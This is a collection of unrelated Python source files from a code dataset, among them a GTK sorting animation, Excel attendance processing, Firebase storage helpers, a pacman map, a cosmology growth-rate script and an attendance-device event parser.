            self.value = new_value
            self.display_widget.queue_draw()
        #end if
    #end set_value

    def set_selected(self, new_selected) :
        "updates the highlight state, queueing a redraw only on change."
        if new_selected != self.selected :
            self.selected = new_selected != False
            self.display_widget.queue_draw()
        #end if
    #end set_selected

#end ItemWidget
def recompute_ordered() :
    "sets ordered_label to show how well-ordered the sort elements are:" \
    " 1.0 for completely in order, -1.0 for completely the wrong order," \
    " or something correspondingly in-between."
    # fixme: this interpretation of “ordered” parameter tends to be too
    # close to zero compared with shuffle performed according to
    # “--ordered” setting. Latter make sense (value of 0 gives good random
    # order), this one needs fixing.
    score = sum \
      (
        (1 if the_sort_items[k] <= the_sort_items[k + 1] else -1)
        for k in range(nr_sort_items - 1)
      )
    ordered_label.set_text("Ordered: %.2f" % (score / (nr_sort_items - 1)))
#end recompute_ordered
class AnimSortClass(SortClass) :
    "provides animated compare and swap callbacks for sort algorithms."

    def compare(self, a, b) :
        # counts the comparison and refreshes the on-screen tally;
        # returns True iff elements a and b are already in order
        global nr_compares
        if verbose :
            sys.stderr.write("compare %d(%d) <=> %d(%d)\n" % (a, the_sort_items[a], b, the_sort_items[b]))
        #end if
        nr_compares += 1
        compare_count_label.set_text("Compares: %d" % nr_compares)
        return the_sort_items[a] <= the_sort_items[b]
    #end compare

    async def swap(self, a, b) :
        # exchanges elements a and b with a two-phase animation:
        # highlight both bars, pause, redraw with swapped values, pause,
        # then remove the highlight
        global nr_swaps
        if verbose :
            sys.stderr.write("swap %d(%d) <=> %d(%d)\n" % (a, the_sort_items[a], b, the_sort_items[b]))
        #end if
        nr_swaps += 1
        swap_count_label.set_text("Swaps: %d" % nr_swaps)
        the_sort_items[b], the_sort_items[a] = the_sort_items[a], the_sort_items[b]
        the_sort_display[a].set_selected(True)
        the_sort_display[b].set_selected(True)
        await asyncio.sleep(sort_step_interval / 2) # give user time to see change
        the_sort_display[a].set_value(the_sort_items[a])
        the_sort_display[b].set_value(the_sort_items[b])
        recompute_ordered()
        await asyncio.sleep(sort_step_interval / 2) # give user time to see change
        the_sort_display[a].set_selected(False)
        the_sort_display[b].set_selected(False)
    #end swap

#end AnimSortClass
#+
# The sorting algorithms
#-
class Bubblesort(AnimSortClass) :

    async def sort(self) :
        "compares every index pair (left, right), left < right, swapping whenever out of order."
        if verbose :
            sys.stderr.write("start sort\n")
        #end if
        for left in range(nr_sort_items) :
            for right in range(left + 1, nr_sort_items) :
                if self.compare(left, right) :
                    continue
                await self.swap(left, right)
            #end for
        #end for
    #end sort

#end Bubblesort
class Quicksort(AnimSortClass) :

    async def partition(self, low, high) :
        # partitions the inclusive range [low .. high] around a pivot that is
        # kept inside the array, then recurses into both sides
        if verbose :
            sys.stderr.write("partition [%d .. %d]\n" % (low, high))
        #end if
        pivot = low
        swap_low = low
        swap_high = high
        # partitioning-in-place algorithm copied from <http://www.cs.auckland.ac.nz/software/AlgAnim/qsort1a.html>
        while swap_low < swap_high :
            while swap_low <= high and self.compare(swap_low, pivot) :
                await self.swap(swap_low, pivot)
                # yes I know, keeping the pivot element in the array, instead
                # of taking it out and putting it back at the end, will lead
                # to increased swap operations.
                pivot = swap_low
                swap_low += 1
            #end while
            while swap_high > low and not self.compare(swap_high, pivot) :
                swap_high -= 1
            #end while
            if swap_low < swap_high and swap_low <= high :
                await self.swap(swap_low, swap_high)
                # track the pivot if it was one of the swapped elements
                if pivot == swap_low :
                    pivot = swap_high
                elif pivot == swap_high :
                    pivot = swap_low
                #end if
            #end if
        #end while
        if pivot > low :
            await self.partition(low, pivot)
        #end if
        if pivot + 1 < high :
            await self.partition(pivot + 1, high)
        #end if
        if verbose :
            sys.stderr.write("done partition [%d .. %d]\n" % (low, high))
        #end if
    #end partition

    async def sort(self) :
        await self.partition(0, nr_sort_items - 1)
    #end sort

#end Quicksort
class Shellsort(AnimSortClass) :

    async def sort(self) :
        # initial increment: smallest power of 2 that is >= nr_sort_items,
        # then halved (minus one) below
        m = 1
        while m < nr_sort_items :
            m += m
        #end while
        m = \
            (
                (m - 1)
                  # to ensure that successive increments are relatively prime,
                  # as per Knuth vol 3 page 91
            >>
                1
            )
        if m == 0 and nr_sort_items > 1 :
            # do at least one pass when sorting 2 elements
            m = 1
        #end if
        while m > 0 :
            # one insertion pass at gap m, then halve the gap
            k = nr_sort_items - m
            for j in range(0, k) :
                i = j
                while True :
                    l = i + m
                    if self.compare(i, l) :
                        break
                    await self.swap(i, l)
                    if i < m :
                        break
                    i -= m
                #end while
            #end for
            m >>= 1
        #end while
    #end sort

#end Shellsort
# dispatch table mapping --algorithm option values to their sort classes
sorting_algorithms = \
    {
        "bubblesort" : Bubblesort,
        "quicksort" : Quicksort,
        "shellsort" : Shellsort,
    }

#+
# Globals
#-

# default params (each overridable from the command line):
nr_sort_items = 10
sort_step_interval = 1.0 # seconds
start_delay = 3.0 # seconds
end_delay = 5.0 # seconds
#+
# GUI callbacks
#-
def stop(_) :
    "callback (e.g. when the main window's close box is clicked) that" \
    " terminates the event loop and hence the program."
    loop.stop()
#end stop
async def sort_task() :
    # let the user see the initial ordering first
    await asyncio.sleep(start_delay)
    sorter = algorithm() # the class selected via --algorithm
    await sorter.sort()
    # leave the sorted result on screen briefly before quitting
    await asyncio.sleep(end_delay)
    loop.stop()
#end sort_task
#+
# Mainline
#-
# parse and validate command-line options (see the header comment for details)
opts, args = getopt.getopt \
  (
    sys.argv[1:],
    "",
    ["algorithm=", "enddelay=", "nrelements=", "ordered=", "startdelay=", "step=", "verbose"]
  )
if len(args) != 0 :
    raise getopt.GetoptError("no arguments expected")
#end if
algorithm = None
ordered = 0.0
verbose = False
for keyword, value in opts :
    if keyword == "--algorithm" :
        algorithm_name = value
        if algorithm_name not in sorting_algorithms :
            raise getopt.GetoptError \
              (
                "unrecognized sorting algorithm \"%(name)s\", must be one of %(list)s"
                %
                {
                    "name" : algorithm_name,
                    "list" : ", ".join(sorted(sorting_algorithms.keys()))
                }
              )
        #end if
        algorithm = sorting_algorithms[algorithm_name]
    elif keyword == "--enddelay" :
        end_delay = float(value)
        if end_delay < 0 :
            raise getopt.GetoptError("--enddelay must not be negative")
        #end if
    elif keyword == "--nrelements" :
        nr_sort_items = int(value)
        if nr_sort_items <= 0 :
            raise getopt.GetoptError("--nrelements must be greater than zero")
        #end if
    elif keyword == "--ordered" :
        ordered = float(value)
        if ordered < -1 or ordered > 1 :
            raise getopt.GetoptError("--ordered must be in [-1 .. 1]")
        #end if
    elif keyword == "--startdelay" :
        start_delay = float(value)
        if start_delay < 0 :
            raise getopt.GetoptError("--startdelay must not be negative")
        #end if
    elif keyword == "--step" :
        sort_step_interval = float(value)
        if sort_step_interval < 0 :
            raise getopt.GetoptError("--step must not be negative")
        #end if
    elif keyword == "--verbose" :
        verbose = True
    #end if
#end for
if algorithm == None : # NOTE(review): “is None” is the idiomatic test here
    raise getopt.GetoptError("no --algorithm specified")
#end if
# build the 1..n element array, honouring the --ordered fraction
the_sort_items = list(range(1, nr_sort_items + 1))
if ordered < 0 :
    # reverse order requested: start reversed, then treat fraction as positive
    the_sort_items = list(reversed(the_sort_items))
    ordered = - ordered
#end if
# partial shuffle: each element is left in place with probability `ordered`,
# otherwise swapped with a randomly chosen slot at or below it
for i in range(nr_sort_items - 1, 0, -1) :
    if random.random() >= ordered :
        j = int(random.random() * (i + 1))
        the_sort_items[i], the_sort_items[j] = the_sort_items[j], the_sort_items[i]
    #end if
#end for
# build the GUI: algorithm name on top, a column of bars (one per element),
# and a row of statistics labels underneath; then start the sort task
main_window = Gtk.Window()
main_window.connect("destroy", stop)
main_window.set_border_width(10)
main_grid = Gtk.Grid()
main_grid.set_column_homogeneous(True)
main_grid.set_row_spacing(8)
algo_name_label = Gtk.Label(algorithm_name)
main_grid.attach(algo_name_label, 0, 0, 1, 1)
items_box = Gtk.Grid()
items_box.set_column_homogeneous(True)
items_box.set_row_spacing(8)
items_box.connect("draw", draw_background)
main_grid.attach_next_to(items_box, algo_name_label, Gtk.PositionType.BOTTOM, 1, 1)
the_sort_display = []
prev_widget = None
for i in range(0, len(the_sort_items)) :
    the_widget = ItemWidget()
    if prev_widget != None :
        items_box.attach_next_to(the_widget.display_widget, prev_widget.display_widget, Gtk.PositionType.BOTTOM, 1, 1)
    else :
        items_box.attach(the_widget.display_widget, 0, 0, 1, 1)
    #end if
    prev_widget = the_widget
    the_widget.set_value(the_sort_items[i])
    the_sort_display.append(the_widget)
#end for
labels_box = Gtk.Grid()
labels_box.set_property("column-spacing", 8)
ordered_label = new_label()
compare_count_label = new_label()
swap_count_label = new_label()
labels_box.attach(ordered_label, 0, 0, 1, 1)
labels_box.attach_next_to(compare_count_label, ordered_label, Gtk.PositionType.RIGHT, 1, 1)
labels_box.attach_next_to(swap_count_label, compare_count_label, Gtk.PositionType.RIGHT, 1, 1)
main_grid.attach_next_to(labels_box, items_box, Gtk.PositionType.BOTTOM, 1, 1)
nr_compares = 0
nr_swaps = 0
main_window.add(main_grid)
main_window.show_all()
# labels were created with placeholder text to size them; clear that now
ordered_label.set_text("")
compare_count_label.set_text("")
swap_count_label.set_text("")
recompute_ordered()
main_window.show()
main_task = loop.create_task(sort_task()) # keep a reference while it runs
#loop.add_signal_handler(signal.SIGINT, stop, None)
  # unnecessary to allow interruption with CTRL/C
loop.run_forever()
998,320 | 1c95cf1883c38ae7669ac2c2c6ba7a35933c9aab | import xlrd
import xlwt
print('xlwt',xlwt.__VERSION__)
def write_excel(data):
    """Write a 2-D sequence `data` to result/result.xls.

    Each inner sequence of `data` becomes one row of the sheet.
    """
    wb = xlwt.Workbook(encoding='utf-8', style_compression=0)
    ws = wb.add_sheet('考勤统计', cell_overwrite_ok=True)
    for row, row_values in enumerate(data):
        # fix: removed stray debug `print(data)` that re-printed the whole
        # dataset once per row
        for col, value in enumerate(row_values):
            ws.write(row, col, value)
    wb.save('result/result.xls')
def read_excel():
    # Read data/total.xls, transform each data row via a sliding 3-slot
    # accounting window (see below), and write the results with write_excel.
    # open the workbook
    workBook = xlrd.open_workbook('data/total.xls');
    # 1. get sheet names
    # 1.1 all sheet names (list)
    allSheetNames = workBook.sheet_names();
    # 1.2 sheet name by index (string)
    sheet1Name = workBook.sheet_names()[0];
    # 2. get sheet contents
    ## 2.1 method 1: by index
    sheet1_content1 = workBook.sheet_by_index(0); # sheet indices start at 0
    ## 2.2 method 2: by sheet name
    sheet1_content2 = workBook.sheet_by_name('Sheet1');
    # 3. sheet name, row count, column count
    print('originData',sheet1_content1.ncols,sheet1_content1.nrows)
    result =[]
    row = 1
    while (row < sheet1_content1.nrows):
        # split this row's cells into alternating "work" (even columns) and
        # "rest" (odd columns) series, each paired with the leading number of
        # its column header (header format "N-...")
        count = 1
        user = []
        work=[]
        rest = []
        headStr = ''
        headStr = sheet1_content1.cell_value(row,0)
        while (count < sheet1_content1.ncols):
            timeArr = []
            timeArr.append(sheet1_content1.col_values(count,0,1)[0])
            timeArr.append(sheet1_content1.cell_value(row,count))
            # timeArr = sheet1_content1.col_values(count)
            if count% 2 == 0:
                time = timeArr[0].split('-')
                work.append([int(time[0]),timeArr[1]])
            else:
                time = timeArr[0].split('-')
                rest.append([int(time[0]),timeArr[1]])
            count = count+1
        # consume each rest amount out of a sliding window (useSleep) of the
        # most recent work amounts, at most 3 slots wide
        useSleep =[]
        key = 0
        print(work,rest)
        for child in work:
            # print(key,useSleep,child,rest[key])
            resTime = rest[key][1]
            if len(useSleep) < 3:
                # window not yet full: append and drain from the front
                useSleep.append(child[1])
                start = 0
                while (resTime!=0):
                    if useSleep[start] < resTime:
                        resTime = resTime - useSleep[start]
                        useSleep[start] = 0
                    else:
                        useSleep[start] = useSleep[start] - resTime
                        # NOTE(review): unlike the >=3 branch below, resTime
                        # is not zeroed here after being fully absorbed, so it
                        # may be subtracted again from the next slot — confirm
                        # whether this double-count is intended
                    start = start +1
                    if start==len(useSleep):
                        resTime = 0
            elif len(useSleep) >=3 :
                # window full: drain across all slots, then slide the window
                # by one and charge any remainder to the newest slot
                start = 0
                while (start != len(useSleep)):
                    if useSleep[start] < resTime:
                        resTime = resTime - useSleep[start]
                        useSleep[start] = 0
                    else:
                        useSleep[start] = useSleep[start] - resTime
                        resTime=0
                    start = start +1
                useSleep = useSleep[1:]
                useSleep.append(child[1])
                if useSleep[2] < resTime:
                    if key == len(rest) -1 :
                        # last rest entry: allow the slot to go negative
                        useSleep[2] = useSleep[2] - resTime
                        resTime = 0
                    else:
                        resTime = resTime - useSleep[2]
                        useSleep[2] = 0
                else:
                    useSleep[2] = useSleep[2] - resTime
            key =key +1
        print(useSleep)
        useSleep.insert(0,headStr)
        result.append(useSleep)
        row = row +1
    print(result)
    write_excel(result)
if __name__ == '__main__':
read_excel(); |
998,321 | c8ec5fe316e8854ffe37d4a611a9e65ae37206d6 | # -*- coding: utf-8 -*-
from firebase_admin import storage
from helpers.helpers import mkdir_conditional
_bucket = storage.bucket()
def upload(blob_name: str, path: str):
    """Upload the local file at *path* into the bucket under *blob_name*."""
    _bucket.blob(blob_name).upload_from_filename(path)
def download(blob_name: str, path: str):
    """Download *blob_name* from the bucket into the local file *path*."""
    blob = _bucket.blob(blob_name)
    # NOTE(review): the directory is hard-coded to 'public' rather than
    # derived from *path* -- confirm every download target lives under public/.
    mkdir_conditional('public')
    blob.download_to_filename(path)
def delete(blob_name: str):
    """Remove *blob_name* from the bucket."""
    _bucket.blob(blob_name).delete()
#
# Example file for variables
#
# Declare a variable and initialize it
f = 0
# print(f)

# re-declaring the variable works
""" f = "abc"
print (f) """

# ERROR: variables of different types cannot be combined
# print("This is a string " + str(123))

# Global vs. local variables in functions
def FUNC():
    """Rebind the module-level name f (via `global`) and print it."""
    global f
    f = "XYZ"
    print (f)

FUNC()
print (f) #this f is outside of FUNC()

del f
# ERROR: after `del f` the name no longer exists, so printing it raises
# NameError (the uncommented print made the module crash on import)
# print (f)
def print_bits( num ):
    """Print the low 16 bits of num grouped into nibbles,
    e.g. print_bits(64) -> '0000 0000 0100 0000'."""
    groups = []
    for shift in range(12, -1, -4):
        nibble = (num >> shift) & 0xF
        groups.append(format(nibble, '04b'))
    print( ' '.join(groups) )
def insert_bits( n, m, i, j ):
    """Return n with bit positions i..j replaced by m (m assumed to fit in
    j-i+1 bits). Prints the operands and the result via print_bits."""
    print_bits( n )
    print_bits( m )
    # All-ones mask with a hole (zeros) at bit positions i..j.
    low_ones = (1 << i) - 1
    clear_mask = (-1 << (j + 1)) | low_ones
    val = (n & clear_mask) | (m << i)
    print_bits( val )
    return val
if __name__ == '__main__':
    # Demo: splice the bit pattern of 6 (0b110) into bits 3..5 of 64.
    insert_bits( 64, 6, 3, 5 )
998,324 | 95e23a76d96b93aabcd243cd95de1dbe1502b0f3 | import pyglet
from ghost import Ghost, GhostUpDown, GhostLeftRight, GhostAimBot
class Mapp:
    """Grid map for the pacman game.

    The map file uses one character per 32x32 tile: '#' marks a wall,
    while '1', '2' and '3' spawn the three ghost variants.
    """

    def __init__(self, filename, pacman):
        self.pacman = pacman
        self.ghosts = []
        with open(filename) as f:
            self.data = [line for line in f]
        self.wall = pyglet.resource.image('W.png')
        # Spawn ghosts from the digit markers in the map.
        for row_idx, line in enumerate(self.data):
            for col_idx, spot in enumerate(line):
                ghost = None
                if spot == '1':
                    ghost = GhostLeftRight()
                elif spot == '2':
                    ghost = GhostUpDown()
                elif spot == '3':
                    ghost = GhostAimBot()
                if ghost is None:
                    continue
                ghost.set_position(col_idx * 32, row_idx * 32)
                if spot == '3':
                    # Aim-bot ghosts start out heading towards pacman.
                    ghost.state = ghost.get_direction_to_pacman(self.pacman)
                self.ghosts.append(ghost)

    def draw(self):
        """Blit a wall sprite on every '#' tile."""
        for row_idx, line in enumerate(self.data):
            for col_idx, spot in enumerate(line):
                if spot == '#':
                    self.wall.blit(col_idx * 32, row_idx * 32)

    def set_position(self, character, p):
        """Place p on each tile marked with *character* (last match wins)."""
        for line_number, line in enumerate(self.data):
            for column_number, spot in enumerate(line):
                if spot == character:
                    p.set_position(column_number * 32, line_number * 32)

    def is_position_on_the_wall(self, xx, yy):
        """Return True when the pixel (xx, yy) lies on a wall tile."""
        column = int(xx // 32)
        row = int(yy // 32)
        return self.data[row][column] == "#"

    def character_touches_wall(self, p):
        """Return True when any corner of p's 32x32 box overlaps a wall."""
        corners = (
            (p.x, p.y),
            (p.x + 31, p.y),
            (p.x + 31, p.y + 31),
            (p.x, p.y + 31),
        )
        # Evaluate all four corners (matches the original's eager checks).
        hits = [self.is_position_on_the_wall(cx, cy) for cx, cy in corners]
        return any(hits)
|
998,325 | 96d8b3416f4aa82d64a235e602547d4a5731002a | # We will use examine the effects that Horndeski models of
# modified gravity/dark energy have on the growth rate of
# structure fsigma8(z) from redshift z=6 to z=0.
# Parameterization of background: 'lcdm'
# Parameterization of gravity: 'hill_scale'
import numpy as np
import matplotlib.pyplot as plt
#To use LaTeX and select Helvetica as the default font:
from matplotlib import rc
rc('font',**{'family':'sans-serif','sans-serif':['Helvetica']})
## for Palatino and other serif fonts use:
#rc('font',**{'family':'serif','serif':['Palatino']})
rc('text', usetex=True)
from classy import Class
def D(z):
    """
    Linear growth function, normalised to unity today:

        D(z) = sqrt( P(k_ls, z) / P(k_ls, 0) )

    where k_ls is a representative large-scale mode.
    """
    k_large_scale = 0.01  # large-scale mode used to define the growth
    ratio = cosmo.pk(k_large_scale, z) / cosmo.pk(k_large_scale, 0)
    return np.sqrt(ratio)
def f(z):
    """
    Linear growth rate f = dlnD/dlna, where a = 1/(1+z), computed with a
    centred finite difference in the scale factor.
    """
    a = 1. / (1. + z)
    da = 0.01 * a  # relative step keeps the stencil accurate at all z
    D_plus = D(1. / (a + da) - 1.)
    D_mid = D(1. / a - 1.)
    D_minus = D(1. / (a - da) - 1.)
    return a * (D_plus - D_minus) / (2 * D_mid * da)
def sigma8(z):
    """Amplitude of matter fluctuations at redshift z: sigma8(0) * D(z)."""
    return cosmo.sigma8() * D(z)
def fsigma8(z):
    """Growth rate of structure: fsigma8(z) = f(z) * sigma8(z)."""
    return f(z) * sigma8(z)
def reldev(y1, y2):
    """Percent deviation of y2 from the reference y1: 100 * (y2 - y1) / y1."""
    return 100. * (y2 - y1) / y1
### Our redshift range ###
# We examine fsigma8 from late times back to z = 1000; in particular the
# modified-gravity models should reduce to LCDM at early times.
# BUG FIX: np.linspace requires an *integer* sample count -- the original
# float literal 5000. raises TypeError on modern NumPy.
zlist = np.linspace(0.011, 1000., 5000)
#zstr=','.join(map(str,zlist+zlist[-1]+2))
# Largest redshift CLASS must tabulate P(k) for (slightly above max(zlist)).
zstr = str(zlist[-1] + 2.)

### The LCDM model ###
lcdmpars = {'output': 'mPk',
            'P_k_max_h/Mpc': 20,
            'z_pk': zstr,
            'background_verbose': 1,  # Info
            'tau_reio': 0.07,
            'omega_cdm': 0.11987,
            'A_s': 2.204e-9,
            'h': 0.6715918,  # computed from 100*theta_s=1.042143
            'N_ur': 3.046-1.,
            'N_ncdm': 1.,
            'm_ncdm': 0.06,
            'omega_b': 0.022252,
            'n_s': 0.96475,
            }

cosmo = Class()      # create universe
cosmo.set(lcdmpars)  # feed params to cosmo
cosmo.compute()
lcdm_fsigma8 = np.array([fsigma8(z) for z in zlist])
### Modified Gravity models ###
## Modifying gravity: alpha_T = 0, ^alpha_K fixed, ^alpha_M = 0.1, scanning ^alpha_B ##
# Start from the LCDM cosmology and switch on the Horndeski ('hill_scale')
# gravity sector on top of it; this avoids repeating the base parameter block.
pars = dict(lcdmpars)
pars.update({
    'Omega_Lambda': 0,  # no cosmological constant
    'Omega_fld': 0,     # no perfect-fluid dark energy
    'Omega_smg': -1,    # Omega_DE -- closure relation fixes the MG density
    'gravity_model': 'hill_scale',
    'expansion_model': 'lcdm',  # model for rho_DE(tau)
})

# Fiducial Horndeski coupling values and M_*^2,ini
M = 1.
a_K = 0.001  # 0.1 / 1.e-6 also tried; the value noticeably affects results
a_B = 0.     # 0.005
a_M = 0.1    # Note: 1 and greater is insane.
a_T = 0.     # 1e-30
# Transition scale factor and rapidity
a_trans = 1. / (1. + 7.)
a_rapidity = 4.  # 3./2. and 0.01 also tried

# Scan over the braiding parameter ^alpha_B.
a_B_mg_fsigma8 = {}
a_B_mg_list = [0.10, 0.11, 0.12, 0.13, 0.14, 0.15, 0.16]  # a_M = 0.1, zt=7, a_r=4.
for a_B in a_B_mg_list:
    pars['parameters_smg'] = "{}, {}, {}, {}, {}, {}, {}".format(
        M, a_K, a_B, a_M, a_T, a_trans, a_rapidity)
    cosmo = Class()
    cosmo.set(pars)
    cosmo.compute()
    a_B_mg_fsigma8[a_B] = np.array([fsigma8(z) for z in zlist])
## Reproducing LCDM: ^alpha_T = 0, ^alpha_K fixed, ^alpha_M = ^alpha_B = 0 ##
# Same base cosmology with every LCDM-breaking coupling switched off --
# this run should track the pure LCDM fsigma8 curve.
pars = dict(lcdmpars)
pars.update({
    'Omega_Lambda': 0,  # no cosmological constant
    'Omega_fld': 0,     # no perfect-fluid dark energy
    'Omega_smg': -1,    # Omega_DE -- closure relation fixes the MG density
    'gravity_model': 'hill_scale',
    'expansion_model': 'lcdm',  # model for rho_DE(tau)
})

# Fiducial Horndeski coupling values and M_*^2,ini (LCDM limit)
_M = 1.
_a_K = 0.001  # 1.e-6
_a_B = 0.
_a_M = 0.
_a_T = 0.
pars['parameters_smg'] = "{}, {}, {}, {}, {}, {}, {}".format(
    _M, _a_K, _a_B, _a_M, _a_T, a_trans, a_rapidity)
cosmo = Class()
cosmo.set(pars)
cosmo.compute()
mg_lcdm_fsigma8 = np.array([fsigma8(z) for z in zlist])
### Plot fsigma8(z) for LCDM and Horndeski gravity ###
# Top panel: fsigma8(z); bottom panel: percent deviation from LCDM.
# FIX: name the figure `fig` instead of `f`, which shadowed the growth-rate
# function defined above.
fig, ax = plt.subplots(2, 1, figsize=(15/1.5, 10/1.5), sharex='col')

# LCDM reference (dashed black).
ax[0].semilogx(zlist, lcdm_fsigma8,
               dashes=[6,4], color='black',
               zorder=2)
ax[0].set_ylabel(r'$f\sigma_8$')

ax[1].semilogx(zlist, reldev(lcdm_fsigma8, lcdm_fsigma8),
               dashes=[6,4], color='black',
               label=r'$\Lambda\mathrm{CDM}$',
               zorder=2)
# BUG FIX: the original label '$\mathrm{rel. dev. [\%]$}' closed the math
# environment before the brace, which is invalid mathtext/LaTeX.
ax[1].set_ylabel(r'$\mathrm{rel.\ dev.\ [\%]}$')
ax[1].set_xlabel(r'$z$')
ax[1].set_ylim(-0.25, 0.05)  ###

# Now plot the MG/DE results.
# Reproducing LCDM (all couplings off).
# BUG FIX: the label strings are now raw strings -- in the non-raw
# originals '\a' of '\alpha' was a BEL escape character.
ax[0].plot(zlist, mg_lcdm_fsigma8,
           zorder=1)
ax[1].plot(zlist, reldev(lcdm_fsigma8, mg_lcdm_fsigma8),
           label=r'$\hat{{\alpha}}_\mathrm{{B}}={}, \hat{{\alpha}}_\mathrm{{M}}={}$'.format(_a_B, _a_M),
           zorder=1)
# MG: one curve per scanned braiding value.
for a_B in a_B_mg_list:
    ax[0].plot(zlist, a_B_mg_fsigma8[a_B],
               zorder=1)
    ax[1].plot(zlist, reldev(lcdm_fsigma8, a_B_mg_fsigma8[a_B]),
               label=r'$\hat{{\alpha}}_\mathrm{{B}}={}, \hat{{\alpha}}_\mathrm{{M}}={}$'.format(a_B, a_M),
               zorder=1)

plt.tight_layout()
# Remove whitespace between upper and lower plots.
plt.subplots_adjust(hspace=0, wspace=0.3)
# Tick marks on all sides of each plot.
for j in range(2):
    axes = ax[j]
    axes.tick_params(axis='both', which='both', direction='in',
                     top=True, right=True)
    legend = axes.legend(framealpha=0)

#plt.savefig('fsigma8_Horndeski_hill_scale_braiding_planck_mass_run_rate_z_0_to_1000.pdf', format='pdf')
plt.savefig('fsigma8_Horndeski_hill_scale_braiding_planck_mass_run_rate_z_0_to_1000_close_up.pdf', format='pdf')
plt.show()
|
# Read a text file three different ways: whole-file, direct iteration,
# and readlines().
filepath = 'learning_python.txt'

# 1. Read the entire contents in one go.
with open(filepath) as file_object:
    data = file_object.read()
print(data)
print()

# 2. Iterate over the open file handle directly.
# BUG FIX: the loop variable was previously named `object`, shadowing the
# builtin of the same name.
with open(filepath) as file_object:
    for line in file_object:
        print(line.strip())
print()

# 3. Slurp all lines into a list with readlines().
with open(filepath) as file_object:
    lines = file_object.readlines()
for line in lines:
    print(line.strip())
import numpy as np  # BUG FIX: the module used np without ever importing it


def generator(data, lookback, delay, min_index, max_index, shuffle=False, batch_size=128, step=6):
    """
    Python generator that takes an array of time-series data and yields
    batches of data from the recent past along with a target. It can be
    used for MIMO, SISO, MISO, and SIMO.

    Parameters
    ----------
    data : numpy.ndarray
        2d tensor of shape (timesteps, input_features).
    lookback : int
        How many timesteps back the input data should go.
    delay : int
        How many timesteps in the future the target should be.
    min_index, max_index : int
        Indices in ``data`` that delimit which timesteps to draw from;
        ``max_index=None`` means "up to the last usable timestep".
    shuffle : bool
        Whether to shuffle the samples or draw them in chronological order.
    batch_size : int
        The number of samples per batch.
    step : int
        The period, in timesteps, at which you sample data.

    Yields
    ------
    samples : 3d tensor (batch_size, lookback // step, input_features)
    targets : 2d tensor (batch_size, input_features)
    """
    if max_index is None:
        max_index = len(data) - delay - 1
    i = min_index + lookback
    while True:
        if shuffle:
            rows = np.random.randint(min_index + lookback, max_index + 1, size=batch_size)
        else:
            if i + batch_size >= max_index:
                # Wrap around once the chronological cursor reaches the end.
                i = min_index + lookback
            rows = np.arange(i, min(i + batch_size, max_index + 1))
            i += len(rows)

        samples = np.zeros((len(rows), lookback // step, data.shape[-1]))
        targets = np.zeros((len(rows), data.shape[-1]))
        for j, row in enumerate(rows):
            indices = range(rows[j] - lookback, rows[j], step)
            samples[j] = data[indices]
            targets[j] = data[rows[j] + delay]
        yield samples, targets
# Example usage. Guarded under __main__ so importing the module has no side
# effects; the bare ``Example:`` label that used to sit here was a
# module-level SyntaxError.
if __name__ == '__main__':
    data_ex = np.random.random((100, 3))
    lookback = 10
    step = 1
    delay = 1
    batch_size = 128

    train_gen = generator(data_ex,
                          lookback=lookback,
                          delay=delay,
                          min_index=0,
                          max_index=50,
                          shuffle=True,
                          step=step,
                          batch_size=batch_size)
    validation_gen = generator(data_ex,
                               lookback=lookback,
                               delay=delay,
                               min_index=51,
                               max_index=75,
                               step=step,
                               batch_size=batch_size)
    test_gen = generator(data_ex,
                         lookback=lookback,
                         delay=delay,
                         min_index=76,
                         max_index=None,
                         step=step,
                         batch_size=batch_size)

    # Access the data
    xi, yo = next(train_gen)
    # xi shape is (128, 10, 3)
    # yo shape is (128, 3)
|
998,328 | e0590bacd1b8ceb72806a7dacd2d0ce5ba9072e6 | import struct
import pyzatt.zkmodules.defs as DEFS
"""
This file contains the functions to extract info of realtime events
incoming from attendance devices.
Author: Alexander Marin <alexuzmarin@gmail.com>
"""
class RealtimeMixin:
    """Parsers for realtime event packets pushed by attendance devices.

    The parse_* helpers read ``self.last_event_code`` and
    ``self.last_payload_data``, which are populated elsewhere by
    recv_event()/recv_reply().
    """

    def enable_realtime(self):
        """
        Sends command to enable realtime events.

        :return: None.
        """
        self.send_command(cmd=DEFS.CMD_REG_EVENT,
                          data=bytearray([0xff, 0xff, 0x00, 0x00]))
        self.recv_reply()

    def get_last_event(self):
        """
        Returns the last event code.

        :return: Integer, last event code (as given on the session id field).
        """
        return self.last_event_code

    def parse_alarm_type(self):
        """
        Extracts the alarm type of the last event.

        :return: Integer, alarm type; -1 if the last event is not an alarm.
        """
        alarm_type = -1
        if self.last_event_code == DEFS.EF_ALARM:
            alarm_type = struct.unpack('<I', self.last_payload_data[0:4])[0]
        return alarm_type

    def parse_duress_alarm(self):
        """
        Extracts info from an alarm event packet.

        :return: List [alarm_type, user_sn, match_type]; a list of -1
            values [-1, -1, -1] if the last event is not an alarm.
        """
        alarm_type = -1
        sn = -1
        match_type = -1
        if self.last_event_code == DEFS.EF_ALARM:
            alarm_type = struct.unpack('<H', self.last_payload_data[4:6])[0]
            sn = struct.unpack('<H', self.last_payload_data[6:8])[0]
            match_type = struct.unpack('<I', self.last_payload_data[8:12])[0]
        return [alarm_type, sn, match_type]

    def parse_event_attlog(self):
        """
        Extracts info from an attendance event.

        :return: List [user_id, verification_type, date_str] where
            verification_type is (password=0, fp=1, rfid=2) and the date
            string has the format yyyy/mm/dd HH:MM:SS; ['', -1, ''] if the
            last event is not an attendance log.
        """
        uid = ''
        ver_type = -1
        date_str = ''
        if self.last_event_code == DEFS.EF_ATTLOG:
            uid = self.last_payload_data[0:9].decode('ascii').\
                replace('\x00', '')
            ver_type = struct.unpack('<H', self.last_payload_data[24:26])[0]
            # The year byte is stored as an offset from 2000.
            date_str = "20%i/%i/%i %i:%i:%i" %\
                tuple(self.last_payload_data[26:32])
        return [uid, ver_type, date_str]

    def parse_event_enroll_fp(self):
        """
        Extracts info from an enrolled fingerprint event.

        :return: List [enroll_ok, user_id, finger_index, template_size];
            [False, '', -1, -1] if the last event is not an enroll event.
        """
        uid = ''
        fp_idx = -1
        fp_size = -1
        enroll_flg = False
        if self.last_event_code == DEFS.EF_ENROLLFINGER:
            # A zero result code means the enrollment succeeded.
            enroll_flg = True if \
                struct.unpack('<H', self.last_payload_data[0:2])[0] == 0\
                else False
            uid = self.last_payload_data[4:13].decode('ascii').\
                replace('\x00', '')
            fp_idx = self.last_payload_data[13]
            fp_size = struct.unpack('<H', self.last_payload_data[2:4])[0]
        return [enroll_flg, uid, fp_idx, fp_size]

    def parse_score_fp_event(self):
        """
        Extracts the score of a given fingerprint sample in an enrolling
        procedure.

        :return: Integer, the score may be 100 (valid) or 0 (invalid);
            -1 if it fails to extract the score.
        """
        score = -1
